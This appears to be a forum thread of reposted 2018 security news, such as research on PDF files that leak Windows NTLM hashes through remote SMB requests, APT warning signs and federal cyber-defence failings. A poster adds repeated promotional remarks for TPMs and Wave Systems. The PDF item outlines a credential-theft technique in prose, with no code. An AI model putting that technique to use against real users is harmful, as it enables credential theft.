PDF files can be weaponized by malicious actors to steal Windows credentials (NTLM hashes) without any user interaction, and only by opening a file, according to Assaf Baharav, a security researcher with cyber-security Check Point.
Baharav published research this week showing how a malicious actor could take advantage of features natively found in the PDF standard to steal NTLM hashes, the format in which Windows stores user credentials.
"The PDF specification allows loading remote content for the GoToE & GoToR entries," Baharav told Bleeping Computer today.
Stealing Windows credentials via PDF and SMB
For his research, Baharav created a PDF document that would utilize these two PDF functions. When someone would open this file, the PDF document would automatically make a request to a remote malicious SMB server.
By design, all SMB requests also include the NTLM hash for authentication purposes. This NTLM hash would be recorded in the remote SMB server's log. Tools are available that can break this hash and recover the original password.
This type of attack is not new, at all, and in the past, has been executed by initiating SMB requests from inside Office documents, Outlook, browsers, Windows shortcut files, shared folders, and other Windows OS internal functions.
All PDF readers are most likely vulnerable
Now, Baharav has shown that PDF files are just as dangerous. The Check Point researcher told Bleeping Computer that he only field-tested the attack on Adobe Acrobat and FoxIT Reader.
"We chose to test these two high profile PDF readers," Baharav told us. "Regarding the others, we highly suspect they may be vulnerable as well."
"We followed a 90 days disclosure policy by notifying only Adobe and Foxit regarding the issues," Baharav says.
While FoxIT did not reply, Adobe said it doesn't plan to modify its software, deferring to Windows OS-level mitigations. Adobe engineers were referring to Microsoft Security Advisory ADV170014, released in October 2017.
Microsoft released ADV170014 to provide a technical mechanism and instructions on how users could disable NTLM SSO authentication on Windows operating systems, in the hopes of stopping the theft of NTLM hashes via SMB requests made to servers located outside the local network.
"The best practice here is to follow Microsoft optional security enhancement," Baharav told us.
Massive phishing campaign targets half a billion users in the first quarter 2018
Things like Windows login ids, passwords, and bank ids and passwords could all be protected by two factor authentication. Wave and its simple to use, elite and creative products (both retired and current) could play a huge role in protecting users against phishing attacks.
https://www.scmagazine.com/massive-phishing-campaign-targets-half-a-billion-users-in-the-first-quarter-2018/article/761541/
A massive phishing campaign has targeted more than 550 million email users globally since the first quarter of 2018.
Vade Secure security researchers first spotted the campaign in early January with a high concentration of impacted email users include the U.S., U.K., France, Germany, and the Netherlands, according to a recent blog post.
The attacks managed to go under the radar as they weren't detected by many existing email security solutions since the phishing emails use IP addresses, servers, and domain names appear to be leased and therefore legitimate.
Threat actors are also using URL shortening tools to and are linking several hundred URLs together, in order to hide the ultimate destination address and jam detection tools, researchers said.
The attacks are likely being carried out by a serious criminal organization as the cost of the infrastructure required to carry out attacks on this scale cost tens of thousands of dollars.
The emails masquerade as popular brands, online streaming services, and telecom operators based on the country of the recipients and are designed to steal users' bank account details by offering them a coupon or discount in exchange for participating in a quiz or online contest.
“The number of unique malwares caught by our filter exceeded the number of unique phishing emails throughout 2017, spiking in November,” researchers said in the post. “With the launch of this new attack in January 2018, however, unique phishing emails surged past malware. In fact, the ratio of phishing to malware was nearly 21:1 in Q1 2018.”
In order to prevent falling for the attacks researchers recommend users remain vigilant even if the email message appears to be coming from a familiar brand and never click the links within suspicious emails.
5 signs you've been hit with an advanced persistent threat (APT)
This article highlights the damages of APTs and Wave's products could mitigate the damages caused by APTs. Wave VSC 2.0, Wave Endpoint Monitor and known devices could play an important role in stopping these APT attacks. imo.
https://www.csoonline.com/article/2615666/security/security-5-signs-you-ve-been-hit-with-an-advanced-persistent-threat.html#tk.twt_cso
Do you have valuable data on your network? Noticing odd network behavior? You could be the victim of an APT attack
Advanced persistent threat (APT) hackers and malware are more prevalent and sophisticated than ever. APTs are professional hackers, working either for their government or relevant industries, whose full-time job is to hack specific companies and targets. They perform actions relevant to their sponsor’s interests, which can include accessing confidential information, planting destructive code, or placing hidden backdoor programs that allow them to sneak back into the target network or computer at-will.
APT hackers are very skilled and have the huge operational advantage in that they will never be arrested. Imagine how much more successful and persistent any other thief might be if they could get the same guarantee.
Still, they don’t want their activities to be immediately noticed by their targets, because it would complicate their mission. A successful APT breaks into networks and computers, gets what they need, and slips out unnoticed. They prefer to be “slow and low.” They don’t want to generate a lot of strange-looking auditable events, error messages, or traffic congestion, or to cause service disruptions.
Most APTs use custom code to do their activities, but prefer, at least at first, to use publicly known vulnerabilities to do their dirty work. That way, if their activities are noticed, it’s harder for the victim to realize that it’s an APT versus the regular, less serious, hacker or malware program.
With that said, how can you recognize something that’s meant to be silent and unnoticed?
Recognizing an APT
Because APT hackers use different techniques from ordinary hackers, they leave behind different signs. Over the past two decades, I've discovered the following five signs are most likely to indicate that your company has been compromised by an APT. Each could be part of legitimate actions within the business, but their unexpected nature or the volume of activity may bear witness to an APT exploit.
1. Increase in elevated log-ons late at night
APTs rapidly escalate from compromising a single computer to taking over multiple computers or the whole environment in just a few hours. They do this by reading an authentication database, stealing credentials, and reusing them. They learn which user (or service) accounts have elevated privileges and permissions, then go through those accounts to compromise assets within the environment. Often, a high volume of elevated log-ons occur at night because the attackers live on the other side of the world. If you suddenly notice a high volume of elevated log-ons across multiple servers or high-value individual computers while the legitimate work crew is at home, start to worry.
2. Widespread backdoor Trojans
APT hackers often install backdoor Trojan programs on compromised computers within the exploited environment. They do this to ensure they can always get back in, even if the captured log-on credentials are changed when the victim gets a clue. Another related trait: Once discovered, APT hackers don't go away like normal attackers. Why should they? They own computers in your environment, and you aren't likely to see them in a court of law.
These days, Trojans deployed through social engineering provide the avenue through which most companies are exploited. They are fairly common in every environment, and they proliferate in APT attacks.
3. Unexpected information flows
Look for large, unexpected flows of data from internal origination points to other internal computers or to external computers. It could be server to server, server to client, or network to network.
Those data flows might also be limited, but targeted -- such as someone picking up email from a foreign country. I wish every email client had the ability to show where the latest user logged in to pick up email and where the last message was accessed. Gmail and some other cloud email systems already offer this.
This has become harder to perform because so much of today’s information flows are protected by VPNs, usually including TLS over HTTP (HTTPS). Although this used to be rare, many companies now block or intercept all previously undefined and unapproved HTTPS traffic using a security inspection device chokepoint. The device “unwraps” the HTTPS traffic by substituting its own TLS digital and acts as a proxy pretending to be the other side of the communication’s transaction to both the source and destination target. It unwraps and inspects the traffic, and then re-encrypts the data before sending it onto the original communicating targets. If you’re not doing something like this, you’re going to miss the exfiltrated data leak.
Of course, to detect a possible APT, you have to understand what your data flows look like before your environment is compromised. Start now and learn your baselines.
4. Unexpected data bundles
APTs often aggregate stolen data to internal collection points before moving it outside. Look for large (gigabytes, not megabytes) chunks of data appearing in places where that data should not be, especially if compressed in archive formats not normally used by your company.
5. Focused spear-phishing campaigns
If I had to think of one of the best indicators, it would be focused spear-phishing email campaigns against a company's employees using document files (e.g., Adobe Acrobat PDFs, Microsoft Office Word, Microsoft Office Excel XLS, or Microsoft Office PowerPoint PPTs) containing executable code or malicious URL links. This is the original causative agent in the vast majority of APT attacks.
The most important sign is that the attacker’s phish email is not sent to everyone in the company, but instead to a more selective target of high-value individuals (e.g., CEO, CFO, CISO, project leaders, or technology leaders) within the company, often using information that could only have been learned by intruders that had already previously compromised other team members.
The emails might be fake, but they contain keywords referring to real internal, currently ongoing projects and subjects. Instead of some generic, “Hey, read this!” phishing subject, they contain something very relevant to your ongoing project and come from another team member on the project. If you’ve ever seen one of these very specific, targeted phishing emails, you’ll usually end up shuddering a bit because you’ll question yourself about whether you could have avoided it. They are usually that good.
If you hear of a focused spear-phishing attack, especially if a few executives have reported being duped into clicking on a file attachment, start looking for the other four signs and symptoms. It may be your canary in the coal mine.
That said, I hope you never have to face cleaning up from an APT attack. It's one of the hardest things you and your enterprise can do. Prevention and early detection will reduce your suffering.
WidePoint Awarded Follow-On Federal Contracts for Identity Management Credentialing Services
Wave at one time was involved with this. Maybe they will be again in the future.
https://www.prnewswire.com/news-releases/widepoint-awarded-follow-on-federal-contracts-for-identity-management-credentialing-services-300633789.html
MCLEAN, Va., April 23, 2018 /PRNewswire/ -- WidePoint Corporation (NYSE American: WYY), a leading provider of Trusted Mobility Management (TM2) specializing in Telecommunications Lifecycle Management (TLM) and Cybersecurity solutions, today announced four follow-on federal contract awards valued at more than $770,000 to provide Identity Management (IdM) services including certificate issuance and credentialing.
Caroline Godfrey, Chief Security Officer, WidePoint Cybersecurity Solutions Corporation, stated, "WidePoint has been an approved and trusted issuer of U.S. Government strong authentication credentials since 1999 and a provider of IdM credentialing services since 2006. WidePoint is honored by these contract renewals and looks forward to continuing to deliver our demonstrated superior services for agencies across the federal government."
"Identity management is a cornerstone of WidePoint's Trusted Mobility Management (TM2) Framework," said Mr. Jin Kang, Chief Executive Officer of WidePoint Corporation. "WidePoint has developed a unique and highly customizable approach for deploying PIV-I credentials that provides enhanced security and compliance."
Jason Holloway, President and Chief Executive Officer of WidePoint Cybersecurity Solutions Corporation, stated, "WidePoint is excited to develop new opportunities through our validation, authentication and credentialing contracts to showcase how TM2 provides complete end-to-end authentication and management for the mobile environment."
Companies are stopping more cyber attacks, but have room to improve defenses, survey shows
How about a successful prevention rate closer to 100%? 100% TPMs turned on in computers could be the 'new' technology these companies need.
https://www.cyberscoop.com/accenture-cyberattacks-companies-survey-2018/?utm_campaign=CyberScoop%20-%20Editorial&utm_content=70344199&utm_medium=social&utm_source=twitter
Big companies might experience more cyberattacks now than they did a year ago, but they are becoming more successful at blocking them, according to a new survey by global consultancy Accenture.
The survey found that 87 percent of focused cyberattacks are prevented, compared to 70 percent reported in a similar study a year ago, but the success rate could go even higher, Accenture said. Less than half of the surveyed companies are using technologies like artificial intelligence, machine learning and automation in the fight, the survey found.
“Only one in eight focused cyberattacks are getting through versus one in three last year, indicating that organizations are doing a better job of preventing data from being hacked, stolen or leaked,” Kelly Bissell, managing director of Accenture Security, said in a press release Monday. “While the findings of this study demonstrate that organizations are performing better at mitigating the impact of cyberattacks, they still have more work to do.”
For the report, “Gaining Ground on the Cyber attacker: 2018 State of Cyber Resilience,” Accenture canvassed 4,600 enterprise security practitioners that represent companies with revenues of $1 billion or more in 15 countries.
More than 80 percent of respondents agreed that acquiring new technology is essential to securing the future of organizations.
“Building investment capacity for wise security investments must be a priority for those organizations who want to close the gap on successful attacks even further,” Bissell said. “For business leaders who continue to invest in and embrace new technologies, reaching a sustainable level of cyber resilience could become a reality for many organizations in the next two to three years. That’s an encouraging projection.”
Breaching critical systems a simple task for today's hackers
If the government and companies turned on the TPM in 100% of its computers and used products from Wave, they'd have vastly improved security. imo. And they wouldn't have to wait 200-300 days to know if an unknown device tried to penetrate their networks.
http://thehill.com/opinion/cybersecurity/384137-breaching-critical-systems-a-simple-task-for-todays-hackers
While most of Capitol Hill was focused on Mark Zuckerberg’s testimony last week regarding privacy settings and his business model, the other key policy priority of our technological era went unaddressed: cybersecurity and the threat posed by hackers, cybercriminals and cyberterrorists.
Government information systems are of considerable concern to the welfare of the country. With significant breaches including the U.S. Voter Database, National Archives and Records Administration, and Office of Personnel Management (OPM) over the past decade — not to mention many breaches at the state and local level — it’s safe to say that the public has moved beyond surprise when a new attack hits the news.
Nearly everyone (including this writer) was intimately impacted by the OPM breach; it goes without saying how a compromise to voting records and technology could affect the nation. Because of these concerns, I tend to view cybersecurity research with keen interest in how the government stacks up against other industries.
As congressional leaders in both chambers review and rethink America’s cyber defense posture, it’s critical that we know what we are up against. It’s not hyperbole to say that we are at war with bad actors in our connected world, and we need to follow Sun Tzu’s timeless military philosophy and know our enemy.
To do this, I led an extensive research study called “The Black Report” where we asked over a hundred hackers, penetration testers and incident responders about their capabilities and motivations.
The top finding should trouble all of us: half of our respondents said they can breach a federal or state target, locate critical value data, and exfiltrate it in under 15 hours.
You read that correctly, but I’ll reiterate. If a determined attacker decides they want your critical value data — whatever that term means to your organization — at 7 a.m., they’ll most likely get it by 10 p.m. the same day. As many industry-standard reports tell us, breached organizations normally don’t detect a breach for anywhere between 200-300 days. That’s an awful long time to go without acting, especially when the nation’s security is potentially at stake.
As policymakers, as participants in the workforce, as members of a thriving democracy, this situation is unacceptable. The reasons for this are manifold and require a complete shift in the way we defend our critical systems and data. As I read through the results, however, I began to wonder how our respondents felt about attacking the government compared with, for example, retail organizations. This was one of the differences between our 2018 research and what we produced in our inaugural report — a breakdown of responses by industry.
In something that passes for good news in this report, governments — federal, state and municipal — are ahead of the curve compared to other industries. While "only" half of our respondents could cause serious damage to the public sector within 15 hours, some in the private sector fared far worse. Networks within the retail and restaurant industries were lower-hanging fruit for bad actors.
These numbers bear scrutiny. Why are government targets more difficult to breach and steal information from? Are they “doing security” better than the other industries? That might be the case, and there’s evidence in the form of the 2017 Personal Data Notification and Protection Act, that our defense posture from a networked, IT perspective on the path of stronger and robust solutions.
Hopefully someday we’re writing another article and talking about how attackers need days and weeks to break into our systems, and detection is happening before they make off with our critical data. It won’t happen overnight, but it could become reality if we truly listen to the signals and craft responsible, agile policy that addresses today’s solutions and creates avenues to pursue answers to tomorrow’s.
Chris Pogue is a member of the U.S. Secret Service Electronic Crimes Task Force, the International Association of Chiefs of Police, and the International Association of Financial Crimes Investigators. He is also the head of services, security and partner Integrations at Nuix.
What the heck is trusted computing, anyway?
Viewing this article seems like: Whoa wait a minute!
https://blog.rivetz.com/what-the-heck-is-trusted-computing-anyway-2d063cf520cd
The idea behind trusted computing is that you can trust that your computer is your computer and is doing the things that you want it to do?—?and nothing more.
Pretty simple in theory. Less simple in practice.
Trusted computing got its official start in the late 1990s as an effort to get consumers to trust their personal computers. As the internet rose to prominence, people needed to have faith in these devices and the internet’s tubes to store and transmit your personally identifying information, credit card numbers, and other important data.
I personally recall expressing surprise that a friend would buy something online at the time?—?until he responded, “You ever buy anything over the phone? You trusted the person at the other end of the line, who was probably being paid minimum wage, didn’t you?” Huh. Now that you mention it …
The secure enclaves inside the processor chips inside desktops and laptops came out of the Trusted Computing Platform Alliance’s (TCPA’s) specifications for what actually would constitute a Trusted Computing Platform. In 2003, the TCPA was succeeded by the Trusted Computing Group, which exists to this day. (Related: When TCG was formed, Rivetz CEO Steven Sprague was CEO of Wave Systems, one of the organization’s earliest members.)
Open-source legend Richard Stallman saw this as a threat, however, dubbing trusted computing “treacherous computing” because he saw within it the ability to restrict access to certain types of content. By 2015, he altered his rhetoric a bit:
“At present, ‘Trusted Platform Modules’ are not being used for DRM at all, and there are reasons to think that it will not be feasible to use them for DRM. Ironically, this means that the only current uses of the ‘Trusted Platform Modules’ are the innocent secondary uses?—?for instance, to verify that no one has surreptitiously changed the system in a computer.
Therefore, we conclude that the ‘Trusted Platform Modules’ available for PCs are not dangerous, and there is no reason not to include one in a computer or support it in system software.”
Of course, those “innocent secondary uses” were the actual primary uses for the TPM.
So, since 2004, most devices shipped by the major manufacturers have included a Trusted Platform Module. The thing is, the user has to turn it on in order for it to be used. Most people don’t even know it exists, and even if they did, most wouldn’t know how to enable and use it.
That’s all very well and nice, this trip into the history books. But what does this mean, now?
One of the biggest problems in truly securing our devices is that security layers have historically been an impediment to getting people to actually use security. I mean, two-factor authentication apps have been around for years now, and how many people actually use them? And how many use them when not required by their employer?
Having to take extra steps to sign into an account or platform is annoying. It takes extra time?—?those precious few seconds.
That’s why the concept of trusted computing is so powerful?—?it has the potential to enable you to trust your device and know that it recognises you as you.
Trusted computing got a bump in interest this week when Intel announced its new Intel Security Essentials at the RSA security conference in San Francisco. The capabilities will help protect the trusted enclaves that are the root of trusted computing.
Intel’s announcement will make it easier for Rivetz to implement its trusted computing solutions in PCs, laptops and other devices with Intel processors.
“This standard set of capabilities will accelerate trusted computing as customers build solutions rooted in hardware-based protections,” Intel said in a press release. “Further, these capabilities, directly integrated into Intel silicon, are designed to improve the security posture of computing, lower the cost of deploying security solutions and minimize the impact of security on performance.”
Until now, the trusted computing technologies really haven’t focused on the average user. While Intel was really looking at its customers?—?the device manufacturers?—?when it announced this, it will be easier to bring this level of security to the average consumer.
As Steven told Tai Zen last fall, “in the past, these technologies have only been sold to the CISO, hoping they are going to deploy them inside a large enterprise.”
end of the article is at the link
UK cyber attack reporting set to be more streamlined
I would think that if the current cybersecurity that has gotten us to the point listed in the article then its time for a change that works and is an improvement on the current cybersecurity. Cyber insurance should be mandatory for critical industries. Cyber insurance companies shouldn't have to pay cyber attack claims where TPMs weren't 100% activated across the network. imo. It seems that Wave could have an important role in this with its many excellent cybersecurity products.
https://www.computerweekly.com/news/252438915/UK-cyber-attack-reporting-set-to-be-more-streamlined
Government funding has been allocated to help streamline cyber attack reporting, according to the National Cyber Security Centre
Plans are under way to set up a single point for reporting cyber attacks in the UK to make it easier for organisations to doso, the National Cyber Security Centre (NCSC) has said.
In announcing a new cyber crime classification framework at the CyberUK 2018 conference in Manchester, the NCSC said any cyber attack that may have a national impact should be reported to the NCSC immediately, while individuals or businesses suffering a cyber attack below the national impact threshold should contact Action Fraud, the UK’s national fraud and cyber crime reporting centre.
Paul Chichester, director of operations at the NCSC, clarified the statement, saying there has been no change in the guidance on reporting, but that the new classification system will help organisations to understand more easily the nature of the incident they are dealing with.
The new framework expands the cyber incident categories from three to six, outlining the impact of each category, who reponds to it and what they do.
The new categories of incident are: National cyber emergency, Highly significant incident, Significant incident, Substantial incident, Moderate incident and Localised incident.
“What we are trying to do with the new categorisation and guidance is give organisations more clarity to avoid any ambiguity,” Chichester told Computer Weekly.
“A key part of the work we are doing with law enforcement now and in the future will be to make it as clear as possible for citizens and business.
“In the coming year, we will be working with law enforcement to create a simpler way of reporting incidents and more victim-focused, so there is a single point to report to and the system will ensure that it gets to the right party, whether it is law enforcement or the NCSC.”
At present, said Chichester, there is already a behind-the-scenes capability to ensure that all reports are routed to the most appropriate teams, regardless of whether an incident is reported to the NCSC or Action Fraud.
National Cyber Strategy Coming Soon From White House
Will hardware security (100% turned on TPMs)be a part of this strategy? It would be a lot better than software security alone. imo.
https://www.nextgov.com/cybersecurity/2018/04/national-cyber-strategy-coming-soon-white-house/147382/
The Pentagon will update its cyber policies based on that strategy, an official says.
An updated national strategy that will guide how the Trump administration handles cyber defense and threats is being debated at the White House and “should be forthcoming in the near future,” a Pentagon official told lawmakers Wednesday.
That strategy, in turn, will inform a Defense Department cyber posture document that will likely come out in August, Assistant Secretary of Defense Kenneth Rapuano said.
Rapuano attributed the document’s delay to “evolving dynamics,” “a relatively new administration” and “competing views.”
Lawmakers have long complained that government cyber operations are hindered by the lack of an overarching cyber policy, though numerous such overarching policies failed to stem the tide of cyber strikes against the government during the Obama administration.
Though few details are known about the national cyber strategy, it’s likely to include priorities from a Trump cyber executive order issued in May 2017, former White House Homeland Security Adviser Tom Bossert has said.
Bossert resigned Tuesday, a day after National Security Adviser John Bolton took office.
The three pillars of that executive order were: improving the security of federal government computer networks; leveraging government resources to better secure critical infrastructure, such as hospitals, banks and financial firms; and establishing norms of good behavior in cyberspace and punishing bad behavior.
The Obama administration released a slew of guiding cybersecurity documents out of the White House, including a 2011 International Strategy for Cyberspace and a 2016 Cybersecurity National Action Plan. The Defense Department released its most recent cybersecurity strategy in 2015.
Rapuano was joined at the House Armed Services panel hearing by outgoing U.S. Cyber Command chief Adm. Michael Rogers, who plans to retire in the spring.
Rogers confirmed during the hearing that CYBERCOM teams are expected to reach full operational capability before a deadline at the close of the 2018 fiscal year
Bankruptcy
Bankruptcy was closed on the 9th. Unsecured creditors are receiving or have received approximately 55% of what they wanted. The shareholders didn't receive anything. The final decree says that the case can be reopened. Those are my recollections that I believe to be accurate. Also there may be some distributions, but those may be for creditors. All it would take is a change in companies turning on a integral device called the TPM (using Wave's ERAS)to possibly change the current status of shareholders participating in having a share. Use the TPM, don't waste it. imo.
With trade war looming, Chinese cyberespionage may return
https://www.cyberscoop.com/us-china-trade-war-cyberattacks/
With the prospect of a trade war on the horizon between U.S. and China, cybersecurity and policy experts say government-backed cyberattacks between the two countries may spike after years of calm.
For the last two weeks, Chinese and U.S. government officials have been sparring over the potential creation of tariffs, which would place a tax on foreign exports coming into America.
“Potential tariff implementation could raise uncertainty over the possibility of a trade war between the two countries and possibly drive a further uptick in Chinese cyber espionage,” said Dmitri Alperovitch, chief technology officer of cybersecurity firm CrowdStrike, in a email to CyberScoop. “CrowdStrike has seen some pickup in Chinese cyber espionage activity over the last year, and we expect this trend to continue … There tends to be a shift in activity from nation-state adversaries when major geopolitical events occur.”
Historically, the Chinese government has successfully employed hackers to advance their economy; typically by stealing intellectual property from international companies, according to former U.S. officials. So experts say it would not be surprising to see economic motivations inspire another round of offensive cyber operations by Beijing, which maintains a tight grasp on China’s private technology sector.
The Trump administration already announced a long list of tariffs against China but they’ve yet to sign any into law. According to President Donald Trump, the broad purpose of these tariffs is to improve the U.S.’ existing trade deficit with China.
An accompanying Treasury Department report released alongside the tariffs last month explicitly called out China for cyber-enabled economic espionage.
“This is the first time China’s feeling large-scale trade repercussions directly tied to hacking,” explained Laura Galante, a senior fellow with D.C. think tank Atlantic Council. “[Chinese President Xi Jinping]’s focus is global now, he needs to diversify China’s economic might and markets. I’d expect that state hacking will mirror that shift.”
Analysts described that Treasury report as a significant development in the two countries’ complex relationship.
In response, the Communist Party of China recently announced its own tariff list — further escalating tension and temporarily throwing the U.S. stock market into upheaval.
“There are many unwritten and opaque channels that Beijing can and will use to show the U.S. that there are costs to confronting China,” said Samm Sacks, a Chinese government and technology analyst for the D.C. think tank Center for the Strategic and International Studies (CSIS). “Beijing may use cyber tools to retaliate that will be far more difficult to trace back to U.S. trade actions than tariffs, complicating efforts to negotiate an agreement.”
Contributing to the expected change is the fact that many of the structures which inhibited recent cyber conflict have been weakened.
While a 2015 agreement between then U.S. President Barack Obama and Xi had successfully curbed cyber-enabled economic espionage aimed at U.S. companies, the Trump administration’s aggressive approach to China puts the future of this delicate pact in flux.
One thing is for sure, however: China is certainly capable of responding in cyberspace.
“We assess that, although they have followed through with their commitment to restrain from intellectual property theft for commercial purposes, China is well positioned to resume at least some targeted activity if acquisitions of U.S. companies in high technology fields continues to be denied,” said Christopher Porter, chief intelligence strategist for cybersecurity company FireEye.
Still other experts cautioned any immediate expectations of retaliatory hacks.
“Beijing is unlikely in the near term to take steps that result in increased cyber activity against U.S. firms,” said Paul Triolo, practice head for geo-technology at the Eurasia Group. “IP theft is high on the list of White House grievances, and any obvious up tick would likely be detected by private cybersecurity firms.”
Triolo continued, “over the longer term, if the bilateral relationship goes south as a result of a tit for tat on trade, investment restrictions, visas, and other areas, Beijing perceives as efforts to contain China’s rise as a tech power, then the gloves could come off in other arenas, including cyberspace.”
Cybersecurity fiasco: Interior Department computers trying to talk to Russia, inspectors say
Use Wave's ERAS to enable all of the Interior Department's TPMs and put the department in a stronger position. A lot of their problems would evaporate. Use the TPM; don't waste it. It seems like this for as important as it is could fit in the budget for the short term. imo. A lot of companies should be doing the above anyway.
http://www.foxnews.com/politics/2018/04/05/cybersecurity-fiasco-interior-department-computers-trying-to-talk-to-russia-inspectors-say.html
Three years after Chinese hackers stole security clearance files and other sensitive personal information of some 22 million U.S. federal employees, cyber-defenses at the Department of Interior, which hosted White House Office of Personnel Management (OPM) servers targeted in the theft, were still unable to detect “some of the most basic threats” inside Interior’s computer networks — including malware actively trying to make contact with Russia.
In a 16-month examination of Interior’s ability to detect and respond to cyber-threats, evaluators from the department’s Office of Inspector General (OIG) also discovered that Interior’s technicians simply did not implement a sweeping array of mandatory, government-wide defensive measures ordered up after the disastrous OPM hack, didn’t investigate blocked intrusion attempts, and left “multiple” compromised computers on their network “for months at a time,” according to a redacted OIG report issued in March.
Ultra-sensitive security clearance files have since been moved to the Defense Department, but, among other things, the OIG report noted that:
? sensitive data at Interior could be taken out of the department’s networks “without detection.”
? network logs showed that a computer at the U.S. Geological Survey, an Interior bureau, was regularly trying to communicate with computers in Russia. The messages were blocked, but “the USGS facilities staff did not analyze the alerts.”
? dangerous or inappropriate behavior by network users — including the downloading of pornography and watching pirated videos on Russian and Ukrainian websites — was not investigated.
? computers discovered to be infected with malware were scrubbed as soon as possible and put back into use—meaning little or no effort went into examining the scope and nature of any such threats to the broader network. This happened, the OIG team noted, with one intruder they discovered themselves.
? simulated intrusions or ransomware attacks created by the examiners were carried out with increasing blatancy without a response—in the case of ransomware, for nearly a month
? After the devastating OPM hack, which was discovered in April 2015, the department didn’t even publish a lessons-learned plan for its staffers based on the disaster. The OIG inspectors reported that Interior started to draft an “incident response plan” that month to deal with future intrusions, but “did not publish it until August 2017”— two months after the OIG team had finished their lengthy fieldwork.
? Distressingly, the report also notes that the department’s cybersecurity operations team was not privy to a list of Interior’s so-called “high-value IT assets” prepared by the Chief Information Officer, “due to its sensitive nature.”
In other words, the people tasked with protecting Interior’s most important information sites were not told what they were.
The report notes that such assets include “IT systems, facilities and data that are of particular interest to nation-state adversaries, such as foreign military and intelligence services.” They also often “contain sensitive data or support mission-critical Federal operations.”
In short, “there hasn’t been a lot done” in the wake of the devastating OPM hack, an official in the Inspector General’s office told Fox News. And, to make matters even worse, the OIG official said, “It’s likely that the same tests at other [federal] agencies would yield the same results.”
When OIG staffers presented 23 recommendations to fix the huge gaps in Interior’s digital defenses, the department’s top IT officials agreed — but said some of the most important fixes would take as many as five years, due to budgetary constraints.
“This is totally unacceptable and absurd,” says Jason Chaffetz, former head of the House Committee on Oversight and Government Reform, which in 2016 issued a scathing report on the lapses surrounding the earlier OPM security breach. (Chaffetz has left Congress and is now a Fox News contributor.)
“With one good trip to Best Buy we might be better off,” he added.
A top cybersecurity expert consulted by Fox News concurred, called the report “pretty damning” and evidence of “gross negligence” on the part of Interior’s top cyber-officials. The expert has a deep knowledge of federal information systems and experience with national security issues.
The long-term neglect, inertia and disarray concerning information security at Interior and other parts of the federal bureaucracy dates back to the Obama administration and beyond. But now they offer a steep challenge to the Trump administration, which is trying to impose its own cybersecurity agenda along with a sustained program of information technology-driven management modernization on the shambolic federal bureaucracy.
It is further complicated by previous federal efforts to centralize and rationalize the bureaucracy, including creation of a number of “shared business centers” across the government.
The business center at Interior offered — and still offers -- human resources services to 150 federal agencies, according to its website.
That is where OPM’s personnel servers were located. Though OPM itself was responsible for maintaining the security of its servers, according to the OIG report the hackers who stole personnel files “moved through the U.S. Office of Personnel Management environment through a trusted connection to the [Interior] Department’s data center, pivoting to human resources systems hosted by the Department.”
Such “lateral” connections across the government provided by the service centers are a “gold mine” to foreign intelligence hackers when penetrated, according to the cybersecurity expert consulted by Fox News.
In addition, databases at the Interior Department offer foreign hackers additional sensitive troves.
Interior’s nine bureaus may be best known for managing the nation’s national parks and vast land resources. But federal lands and waters also supply some 30 percent of U.S. oil and gas production, and the department’s bureau of reclamation is the country’s second-largest provider of electrical power. The U.S. Geological Survey monitors water resources and harvests satellite data on a global basis.
Geothermal, solar and wind resources are also concentrated on federal lands, and the department also oversees the safety and environmental soundness of offshore drilling.
In an executive order issued last May, President Trump explicitly declared that “the executive branch has for too long accepted antiquated and difficult-to-defend IT,” and that “known but unmitigated vulnerabilities are among the highest cybersecurity risks faced by executive departments and agencies.”
Heads of federal agencies were supposed to begin reporting on their “risk management measures” to deal with those problems within 90 days of the May 11, 2017, executive order -- while the OIG evaluation of Interior was still in progress. Field work on the Interior report ended a month later, in June.
Queried about the dismal evaluation of Interior’s cyber-defenses, a senior official in the White House Office of Management and Budget, which is in charge of the administration’s cybersecurity makeover, told Fox News that “we all acknowledge there are gaps across the Dot-Gov”-- shorthand for the federal government’s digital domain.
But, he added, “we are leveraging our authority to manage and eliminate these deficiencies. We have put down very ambitious markers and said, here is where we need to go.”
In particular, “we are laser-focused on cyber-security,” he said.
That imperative was reinforced, the official said, in the President’s Management Agenda, a document issued last month that laid out an ambitious, long-term plan for modernizing the federal government, with a sweeping upgrade of information technology as a key tool, along with a reorganization and upgrading of the federal work force and its management—especially the IT work force.
Money needs for the tech upgrade are supposed to come from a renewable, $500 million Technology Modernization Fund. In addition, the president’s proposed 2019 budget — which only happens insofar as Congress lets it — contains some $80 billion in IT and cybersecurity spending, ostensibly a 5.2 percent increase.
Even though the administration’s makeover plans are being pressed forward vigorously and as fast as possible, the presidential management agenda also warns that “deep-seated transformation takes time and will not happen in one or two years.”
The pressure to carry out all those ambitious tasks is supposed to come from, among other things, “continuous performance improvement,” by means of relentless monitoring of results. In cybersecurity, these include annual “performance audits,” carried out under the Federal Information Security Modernization Act and known as FISMA reports, along with an annual report card on information technology acquisitions.
In 2017, Interior’s heavily redacted FISMA account points to numerous holes in Interior’s defenses in a wide array of its departments, and an overall assessment that deficiencies were noted across all the conceptual areas of cybersecurity. The department’s score on the technology acquisition report card dropped from B+ to C in 2017.
In the shorter term, the administration is pinning its hopes on an aggressive move to cloud-based services and other technologies that will move government departments like Interior away from the “perimeter” defenses that the OIG report shows they might not be carrying out in the first place.
The strategy was outlined in yet another report to the president, on Federal IT modernization, issued last December.
The December report underlines that achieving its goals “will require an active shift in the mindset of agency leadership…IT practitioners, and oversight bodies.”
The evaluation of cyber-defenses at Interior is evidence that shift is not yet underway.
2.7 Million UK Businesses Wide Open to IoT Hacks
https://www.infosecurity-magazine.com/news/27m-uk-businesses-wide-open-iot/?utm_source=dlvr.it&utm_medium=twitter
An activated TPM on computers would help UK businesses be better protected than an inactivated TPM. The businesses just need to be informed. imo.
About 2.7 million businesses in the UK are leaving themselves vulnerable to internet of things (IoT) hacks.
ForeScout worked with CensusWide to conduct an independent survey of 500 CIOs and IT decisionmakers to see how prepared they are for IoT cybersecurity and the results were concerning: 47% admitted to not updating default passwords on all IoT devices when they are added to corporate networks; 15% admitted to not keeping security patches up to date.
With 5.7 million registered businesses in the UK, that means nearly 2.7 million are still leaving obvious vulnerabilities in the system for bad actors to exploit.
Making matters worse, UK businesses have a blind spot when it comes to the number of devices connected to their network. Only 54% of respondents had total confidence that they have full visibility and can identify every device on their network.
The visibility challenge for business is only set to increase, with 40% of respondents stating that they are planning to increase their operational technology (OT) spend on connected devices. However, 72% IT managers are concerned about the security implications of adding additional OT devices to their company's network.
